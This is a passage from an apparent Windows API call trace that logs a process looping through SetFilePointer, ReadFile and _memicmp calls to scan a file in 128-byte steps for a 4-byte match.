lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23040, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a00 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23168, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a80 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b00 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b80 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23552, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5c00 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23680, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5c80 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23808, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d00 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=23936, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d80 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e00 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e80 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24320, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24448, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f80 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6000 [0085.931] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.931] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.931] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24704, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6080 [0085.932] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.932] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.932] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24832, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6100 [0085.932] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.932] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.932] SetFilePointer (in: hFile=0xa4, lDistanceToMove=24960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6180 [0085.932] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.932] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.932] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25088, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6200 [0085.932] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.932] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.932] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6280 [0085.932] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.932] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.932] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6300 [0085.932] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.932] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.932] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25472, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6380 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6400 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6480 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25856, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6500 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=25984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6580 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26112, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6600 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6680 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.933] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.933] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6700 [0085.933] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.934] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.934] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26496, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6780 [0085.934] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.934] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.934] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26624, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6800 [0085.934] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.934] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.934] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26752, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6880 [0085.934] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=26880, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6900 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27008, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6980 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27136, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6a00 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27264, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6a80 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b00 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b80 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27648, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6c00 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.935] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27776, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6c80 [0085.935] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.935] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=27904, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d00 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d80 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e00 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28288, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e80 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f00 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f80 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28672, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7000 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7080 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.936] SetFilePointer (in: hFile=0xa4, lDistanceToMove=28928, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7100 [0085.936] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.936] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29056, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7180 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29184, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7200 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29312, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7280 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7300 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29568, lpDistanceToMoveHigh=0x0, 